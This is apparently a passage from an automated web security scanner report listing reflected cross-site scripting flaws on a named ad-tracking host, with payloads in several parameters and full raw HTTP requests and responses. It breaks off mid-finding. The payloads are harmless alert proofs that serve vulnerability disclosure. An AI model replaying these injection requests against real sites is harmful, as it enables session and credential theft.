The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

2.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload 3e6c0<script>alert(1)</script>2500faae125 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=4803e6c0<script>alert(1)</script>2500faae125&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?uilKAFF8CQD5Q0gAAAAAAFufCgAAAAAAAgAAAAYAAAAAAP8AAAAFCW8VDwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgyQQAAAAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABa8F1Eo8UUCvN5p9OBJ4HIO6F18GIqSmJVEsk5AAAAAA==,,http%3A%2F%2Fwww.mysuburbanlife.com%2Flyons%2Flifestyle%2Fentertainment%2Fx1539859994%2Fto-do-tonight-watch-american-idol-priest-opens-friday-the-13th,Z%3D728x90%26s%3D621649%26_salt%3D1477449765%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.mysuburbanlife.com%252Flyons%252Flifestyle%252Fentertainment%252Fx1539859994%252FTo-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th%26r%3D0,1c5cab68-7c9c-11e0-acd7-cb9ffa1aa3ae
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadver_05-11-2011-14-59-16_8816927001305125956ZZZZadcon_05-11-2011-14-59-56_9087559411305125996; SERVERID=s15

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:34:32 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 4803e6c0<script>alert(1)</script>2500faae125-SM=adver_05-12-2011-13-34-32; expires=Sun, 15-May-2011 13:34:32 GMT; path=/; domain=c3metrics.com
Set-Cookie: 4803e6c0<script>alert(1)</script>2500faae125-VT=adver_05-12-2011-13-34-32_12907428141305207272; expires=Tue, 10-May-2016 13:34:32 GMT; path=/; domain=c3metrics.com
Set-Cookie: 4803e6c0<script>alert(1)</script>2500faae125-nUID=adver_12907428141305207272; expires=Thu, 12-May-2011 13:49:32 GMT; path=/; domain=c3metrics.com
Content-Length: 6700
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
ar.c3VJScollection[a]=new c3VTJSInter();this.C3VTcallVar.c3VJScollection[a].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adver';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='4803e6c0<script>alert(1)</script>2500faae125';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='13014572191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='12907428141305207272';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv=
...[SNIP]...
2.2. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 4c8e5<script>alert(1)</script>3b4a9a22f22 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver4c8e5<script>alert(1)</script>3b4a9a22f22&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?uilKAFF8CQD5Q0gAAAAAAFufCgAAAAAAAgAAAAYAAAAAAP8AAAAFCW8VDwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgyQQAAAAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABa8F1Eo8UUCvN5p9OBJ4HIO6F18GIqSmJVEsk5AAAAAA==,,http%3A%2F%2Fwww.mysuburbanlife.com%2Flyons%2Flifestyle%2Fentertainment%2Fx1539859994%2Fto-do-tonight-watch-american-idol-priest-opens-friday-the-13th,Z%3D728x90%26s%3D621649%26_salt%3D1477449765%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.mysuburbanlife.com%252Flyons%252Flifestyle%252Fentertainment%252Fx1539859994%252FTo-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th%26r%3D0,1c5cab68-7c9c-11e0-acd7-cb9ffa1aa3ae
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadver_05-11-2011-14-59-16_8816927001305125956ZZZZadcon_05-11-2011-14-59-56_9087559411305125996; SERVERID=s15

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:34:29 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sun, 15-May-2011 13:34:29 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadver_05-11-2011-14-59-16_8816927001305125956ZZZZadcon_05-11-2011-14-59-56_9087559411305125996ZZZZadver4c8e5%3Cscript%3Ealert%281%29%3C%2Fscript%3E3b4a9a22f22_05-12-2011-13-34-29_14987820991305207269; expires=Tue, 10-May-2016 13:34:29 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver4c8e5%3Cscript%3Ealert%281%29%3C%2Fscript%3E3b4a9a22f22_14987820991305207269; expires=Thu, 12-May-2011 13:49:29 GMT; path=/; domain=c3metrics.com
Content-Length: 6700
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
ar.c3VJScollection[a]=window.c3Vinter}else this.C3VTcallVar.c3VJScollection[a]=new c3VTJSInter();this.C3VTcallVar.c3VJScollection[a].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adver4c8e5<script>alert(1)</script>3b4a9a22f22';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='480';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='13014572191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='149878209913052
...[SNIP]...
2.3. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d1300<script>alert(1)</script>f343af93cf0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=/d1300<script>alert(1)</script>f343af93cf0&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?uilKAFF8CQD5Q0gAAAAAAFufCgAAAAAAAgAAAAYAAAAAAP8AAAAFCW8VDwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgyQQAAAAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABa8F1Eo8UUCvN5p9OBJ4HIO6F18GIqSmJVEsk5AAAAAA==,,http%3A%2F%2Fwww.mysuburbanlife.com%2Flyons%2Flifestyle%2Fentertainment%2Fx1539859994%2Fto-do-tonight-watch-american-idol-priest-opens-friday-the-13th,Z%3D728x90%26s%3D621649%26_salt%3D1477449765%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.mysuburbanlife.com%252Flyons%252Flifestyle%252Fentertainment%252Fx1539859994%252FTo-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th%26r%3D0,1c5cab68-7c9c-11e0-acd7-cb9ffa1aa3ae
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadver_05-11-2011-14-59-16_8816927001305125956ZZZZadcon_05-11-2011-14-59-56_9087559411305125996; SERVERID=s15

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:35:08 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sun, 15-May-2011 13:35:08 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-11-2011-14-59-56_9087559411305125996ZZZZadver_05-12-2011-13-35-08_14282156031305207308; expires=Tue, 10-May-2016 13:35:08 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_14282156031305207308; expires=Thu, 12-May-2011 13:50:08 GMT; path=/; domain=c3metrics.com
Content-Length: 6680
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
c3VJSnuid='14282156031305207308';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='/d1300<script>alert(1)</script>f343af93cf0';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJScollection[a].C3VJSFindBaseurl(c3VTconsts.c3VJSconst.c3VJS
...[SNIP]...
2.4. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the rv request parameter is copied into the HTML document as plain text between tags. The payload def86<script>alert(1)</script>9eee544342d was submitted in the rv parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=def86<script>alert(1)</script>9eee544342d&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?uilKAFF8CQD5Q0gAAAAAAFufCgAAAAAAAgAAAAYAAAAAAP8AAAAFCW8VDwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgyQQAAAAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABa8F1Eo8UUCvN5p9OBJ4HIO6F18GIqSmJVEsk5AAAAAA==,,http%3A%2F%2Fwww.mysuburbanlife.com%2Flyons%2Flifestyle%2Fentertainment%2Fx1539859994%2Fto-do-tonight-watch-american-idol-priest-opens-friday-the-13th,Z%3D728x90%26s%3D621649%26_salt%3D1477449765%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.mysuburbanlife.com%252Flyons%252Flifestyle%252Fentertainment%252Fx1539859994%252FTo-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th%26r%3D0,1c5cab68-7c9c-11e0-acd7-cb9ffa1aa3ae
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadver_05-11-2011-14-59-16_8816927001305125956ZZZZadcon_05-11-2011-14-59-56_9087559411305125996; SERVERID=s15

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:35:00 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sun, 15-May-2011 13:35:00 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-11-2011-14-59-56_9087559411305125996ZZZZadver_05-12-2011-13-35-00_12374438441305207300; expires=Tue, 10-May-2016 13:35:00 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_12374438441305207300; expires=Thu, 12-May-2011 13:50:00 GMT; path=/; domain=c3metrics.com
Content-Length: 6699
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
72191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='12374438441305207300';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='def86<script>alert(1)</script>9eee544342d';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJSc
...[SNIP]...
2.5. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the t request parameter is copied into the HTML document as plain text between tags. The payload f8e87<script>alert(1)</script>c1ec23e9e95 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72f8e87<script>alert(1)</script>c1ec23e9e95&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?uilKAFF8CQD5Q0gAAAAAAFufCgAAAAAAAgAAAAYAAAAAAP8AAAAFCW8VDwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgyQQAAAAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABa8F1Eo8UUCvN5p9OBJ4HIO6F18GIqSmJVEsk5AAAAAA==,,http%3A%2F%2Fwww.mysuburbanlife.com%2Flyons%2Flifestyle%2Fentertainment%2Fx1539859994%2Fto-do-tonight-watch-american-idol-priest-opens-friday-the-13th,Z%3D728x90%26s%3D621649%26_salt%3D1477449765%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.mysuburbanlife.com%252Flyons%252Flifestyle%252Fentertainment%252Fx1539859994%252FTo-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th%26r%3D0,1c5cab68-7c9c-11e0-acd7-cb9ffa1aa3ae
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadver_05-11-2011-14-59-16_8816927001305125956ZZZZadcon_05-11-2011-14-59-56_9087559411305125996; SERVERID=s15

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:34:58 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sun, 15-May-2011 13:34:58 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-11-2011-14-59-56_9087559411305125996ZZZZadver_05-12-2011-13-34-58_711316571305207298; expires=Tue, 10-May-2016 13:34:58 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_711316571305207298; expires=Thu, 12-May-2011 13:49:58 GMT; path=/; domain=c3metrics.com
Content-Length: 6698
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
;this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='13014572191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='711316571305207298';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72f8e87<script>alert(1)</script>c1ec23e9e95';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3V
...[SNIP]...
2.6. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload baa91<script>alert(1)</script>c29c50d111f was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=baa91<script>alert(1)</script>c29c50d111f&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?uilKAFF8CQD5Q0gAAAAAAFufCgAAAAAAAgAAAAYAAAAAAP8AAAAFCW8VDwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgyQQAAAAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABa8F1Eo8UUCvN5p9OBJ4HIO6F18GIqSmJVEsk5AAAAAA==,,http%3A%2F%2Fwww.mysuburbanlife.com%2Flyons%2Flifestyle%2Fentertainment%2Fx1539859994%2Fto-do-tonight-watch-american-idol-priest-opens-friday-the-13th,Z%3D728x90%26s%3D621649%26_salt%3D1477449765%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.mysuburbanlife.com%252Flyons%252Flifestyle%252Fentertainment%252Fx1539859994%252FTo-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th%26r%3D0,1c5cab68-7c9c-11e0-acd7-cb9ffa1aa3ae
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadver_05-11-2011-14-59-16_8816927001305125956ZZZZadcon_05-11-2011-14-59-56_9087559411305125996; SERVERID=s15

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:35:03 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sun, 15-May-2011 13:35:03 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-11-2011-14-59-56_9087559411305125996ZZZZadver_05-12-2011-13-35-03_11345519711305207303; expires=Tue, 10-May-2016 13:35:03 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_11345519711305207303; expires=Thu, 12-May-2011 13:50:03 GMT; path=/; domain=c3metrics.com
Content-Length: 6679
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
.c3VJSnuid='11345519711305207303';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='baa91<script>alert(1)</script>c29c50d111f';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJScollection[a].C3VJSFindBaseurl(c3VTconsts.c3VJSconst.c3VJS
...[SNIP]...
2.7. http://480-adver-view.c3metrics.com/v.js [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /v.js

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload a06dd<script>alert(1)</script>49f90eb1dd2 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

